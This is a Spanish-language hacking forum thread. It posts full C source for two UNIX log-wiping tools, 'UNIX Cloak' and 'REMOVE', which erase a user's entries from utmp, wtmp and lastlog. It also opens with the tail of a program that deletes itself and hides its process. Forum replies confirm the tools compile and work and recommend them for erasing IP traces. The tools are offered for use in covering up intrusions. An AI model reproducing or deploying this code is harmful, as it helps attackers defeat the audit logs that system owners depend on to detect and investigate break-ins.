			fprintf(stderr, "`%s' not modified -- aborted\n", a_Dump);
			exit(1);
		}
		if (!a_Output || !strcmp(a_Input, a_Output))
		{
			backup(a_Input);
			f_backedup=1;
			if (!a_Output) a_Output=a_Input;
			if (!f_EditSrc)
				a_Input=a_Backup;
		}
		makeobject();
		if (f_Clean)
			unlink(a_Dump);
		if ((f_Clean || f_NoBackups) && f_backedup) unlink(a_Backup);
	}
	else if (a_Output)
		{
			if (!strcmp(a_Input, a_Output))
			{
				backup(a_Input);
				f_backedup=1;
				if (!f_EditSrc)
					a_Input=a_Backup;
			}
			makeobject();
			if (f_Clean)
				unlink(a_Dump);
			if ((f_Clean || f_NoBackups) && f_backedup) unlink(a_Backup);
		} else
			makedump();
	if (f_DeleteSelf) unlink(argv[0]);
	puts("Done.");
	if (f_Security)
	{
		close(0);
		close(1);
		close(2);
		setsid();
		if (a_Hide)
		{
			execlp(a_Hide, a_Hide, 0);
			perror(a_Hide);
		}
		if (f_Security)
			kill(getpid(), SIGKILL);
	}
	exit(0);
}




Cloack.c
Código: php

/* UNIX Cloak v1.0 (alpha)  Written by: Wintermute of -Resist- */
/* This file totally wipes all presence of you on a UNIX system*/
/* It works on SCO, BSD, Ultrix, HP/UX, and anything else that */
/* is compatible..  This file is for information purposes ONLY!*/

/*--> Begin source...    */
#include <fcntl.h>
#include <utmp.h>
#include <sys/types.h>
#include <unistd.h>
#include <lastlog.h>

main(argc, argv)
    int     argc;
    char    *argv[];
{
    char    *name;
    struct utmp u;
    struct lastlog l;
    int     fd;
    int     i = 0;
    int     done = 0;
    int     size;

    if (argc != 1) {
         if (argc >= 1 && strcmp(argv[1], "cloakme") == 0) {
	     printf("You are now cloaked\n");
	     goto start;
                                                           }
         else {
	      printf("close successful\n");
	      exit(0);
	      }
		   }
    else {
	 printf("usage: close [file to close]\n");
	 exit(1);
	 }
start:
    name = (char *)(ttyname(0)+5);
    size = sizeof(struct utmp);

    fd = open("/etc/utmp", O_RDWR);
    if (fd < 0)
	perror("/etc/utmp");
    else {
	while ((read(fd, &u, size) == size) && !done) {
	    if (!strcmp(u.ut_line, name)) {
		done = 1;
		memset(&u, 0, size);
		lseek(fd, -1*size, SEEK_CUR);
		write(fd, &u, size);
		close(fd);
	    }
	}
    }


    size = sizeof(struct lastlog);
    fd = open("/var/adm/lastlog", O_RDWR);
    if (fd < 0)
	perror("/var/adm/lastlog");
    else {
	lseek(fd, size*getuid(), SEEK_SET);
	read(fd, &l, size);
	l.ll_time = 0;
	strncpy(l.ll_line, "ttyq2 ", 5);
	gethostname(l.ll_host, 16);
	lseek(fd, size*getuid(), SEEK_SET);
	close(fd);
    }
}


Remove.c

Código: php
/*
REMOVE       -- February 26, 1997
Simple Nomad -- Nomad Mobile Research Centre

Universal utmp, wtmp, and lastlog editor. Actually 
removes, doesn't leave holes...

Compile "cc -o remove remove.c -DGENERIC" and run 
as root. Use -DAIX instead of -DGENERIC for an AIX 
machine. Use -DSCO instead of -DGENERIC for a SCO 
machine. 
*/

#include <stdio.h>
#include <utmp.h>
#include <sys/types.h>
#include <unistd.h>
#include <fcntl.h>
#ifndef AIX
#include <lastlog.h>
#else
#include <login.h>
#endif
#include <pwd.h>

#ifdef AIX
#define WTMP "/var/adm/wtmp"
#define UTMP "/etc/utmp"
#define LASTLOG "/etc/security/lastlog" /* Not a binary file in AIX, so */
/* handled a bit differently.   */
char LogParam[7][30]=
{
  "time_last_login=","tty_last_login=","host_last_login=",
  "unsuccessful_login_count=","time_last_unsuccessful_login=",
  "tty_last_unsuccessful_login=","host_last_unsuccessful_login="
};
#endif
#ifdef SCO
#define WTMP "/etc/wtmp"   /* wtmp was here on the SCO box I accessed */
#define UTMP "/var/adm/utmp"
#define LASTLOG "/var/adm/lastlog"
#endif
#ifdef GENERIC  /* Should work with Linux, IRIX, Digital Unix, BSDs, etc */
#define WTMP "/var/adm/wtmp"
#define UTMP "/var/adm/utmp"
#define LASTLOG "/var/adm/lastlog"
#endif

void main(argc,argv)
int  argc;
char *argv[];
{
  int cleanWtmp(char *,int);
  int cleanUtmp(char *,int);
  int cleanLastlog(char *);
  int getCount(char *,char *);
  char line[10];
  int killem, firstcnt, t;

  if(argc!=2)
  {
    printf("Usage: %s acct\n",argv[0]);
    exit(0);
  }
  firstcnt=getCount(WTMP,argv[1]); /* Get an initial count */
  printf("\nREMOVE by Simple Nomad\nNomad Mobile Research Centre (c) 1997\n\n");
  printf("Found %d record(s) for user %s\n",firstcnt,argv[1]);
  printf("Will attempt a lastlog cleanup by default.\n\n");
  printf("#    - remove last # records from utmp/wtmp\n");
  printf("a    - remove (a)ll records from utmp/wtmp\n");
  printf("q    - (q)uit program\n\n");
  printf("Enter selection -> ");
  gets(line);
  if(line[0]==0x51 || line[0]==0x71) exit(0);
  if(line[0]==0x41 || line[0]==0x61) killem=firstcnt;
  else killem=atoi(line);
  if (killem>firstcnt)
  {
    printf("You cannot delete %d records if only %d exist.\n",killem,firstcnt);
    exit(-1);
  }
  t=cleanWtmp(argv[1],killem); /* Now to clean up utmp and wtmp */
  if (t==1) {
    printf("Trouble cleaning up %s.\n",WTMP);
    exit(-1);
  } else printf("REMOVE cleaned up %d record(s) from %s\n",killem,WTMP);
  t=cleanUtmp(argv[1],killem);
  if (t==1) {
    printf("Trouble cleaning up %s.\n",UTMP);
    exit(-1);
  } else printf("REMOVE cleaned up %d record(s) from %s\n",killem,UTMP);
  t=cleanLastlog(argv[1]);    /* Make our attempt at lastlog */
  if (t==1) {
    printf("Trouble cleaning up %s.\n",LASTLOG); exit(-1);
  }
  printf("REMOVE cleaned up %s\n",LASTLOG);
} /* end main */

int getCount(fname,acct) /* Go check wtmp and find out how many records */ 
char *fname, *acct;
{
  struct utmp utmp_ent;
  int f,cnt=0;

  if((f=open(fname,O_RDWR))>=0){
    while(read(f,&utmp_ent,sizeof(utmp_ent)))if(!strncmp(utmp_ent.ut_name, acct,strlen(acct)))cnt++;
  }
  close(f);
  return(cnt);
} /* end getCount */

int cleanWtmp(acct,killem)
char *acct;
int killem;
{
  struct utmp utmp_ent;
  int fd,count=0;
  if((fd=open(WTMP,O_RDWR))>=0){
    while(read(fd,&utmp_ent,sizeof(utmp_ent)))if(!strncmp(utmp_ent.ut_name,acct,strlen(acct)))count++;
    lseek(fd,0,SEEK_SET);
    while(read(fd,&utmp_ent,sizeof(utmp_ent))&&killem){
      if(!strncmp(utmp_ent.ut_name,acct,strlen(acct))){
        count--;
        if(count+1<=killem){
          bzero((char *)&utmp_ent,sizeof(utmp_ent));
          lseek(fd,-(sizeof(utmp_ent)),SEEK_CUR);
          write(fd,&utmp_ent,sizeof(utmp_ent));
          killem--;
        }
      }
    }
    close(fd);
  }
  else return(1);
} /* end cleanWtmp */

int cleanUtmp(acct,killem)
char *acct;
int killem;
{
  struct utmp utmp_ent;
  int fd;
  if((fd=open(UTMP,O_RDWR))>=0){
    lseek(fd,0,SEEK_SET);
    while(read(fd,&utmp_ent,sizeof(utmp_ent))&&killem){
      if(!strncmp(utmp_ent.ut_name,acct,strlen(acct))){
        if(killem>0){
          bzero((char *)&utmp_ent,sizeof(utmp_ent));
          lseek(fd,-(sizeof(utmp_ent)),SEEK_CUR);
          write(fd,&utmp_ent,sizeof(utmp_ent));
          killem--;
        }
      }
    }
    close(fd);
  }
  else return(1);
} /* end cleanUtmp */

int cleanLastlog(acct) /* The lastlog subroutine */ 
char *acct;
{
#ifdef AIX /* Quite a kludge for AIX, but what the fuck it works */
  int t,i;
  char entry[200];
  for (i=0;i<7;i++)
  {
    sprintf(entry,"chsec -f %s -s %s -a %s>/dev/null",LASTLOG,acct,LogParam[i]);
    t=system(entry);
    printf("Return code for %s is %d\n",LogParam[i],t);
  }
#else  /* Normal binary lastlog cleanup */
  struct passwd *pwd;
  struct lastlog logit;
  int f;
  if((pwd=getpwnam(acct))){
    if((f=open(LASTLOG,O_RDWR))>=0){
      lseek(f,(long)pwd->pw_uid*sizeof(struct lastlog),0);
      bzero((char *)&logit,sizeof(logit));
      write(f,(char *)&logit,sizeof(logit));
      close(f);
    }
  }
  else return(1);
#endif
} /* end cleanLastlog */
Marzo 30, 2010, 11:57:03 AM #7
Uno en batch estaría tremendo..
Marzo 30, 2010, 12:20:59 PM #8
Tenia uno en batch

Marzo 31, 2010, 11:42:53 AM #9
Lo compile y me anda perfecto  ;D
Marzo 31, 2010, 03:31:12 PM #10
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Lo compile y me anda perfecto  ;D

Cual de todos ?
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Abril 30, 2010, 01:30:43 PM #11
lo mejor para borrar logs ip
se tiene que tener privilegios para ponerlo a andar
pero cuidado se puede borrar el sistema
el mundo es una variable facil inicias facil terminas

=_=
Imprimir
Ir Arriba Páginas1
Acciones del Usuario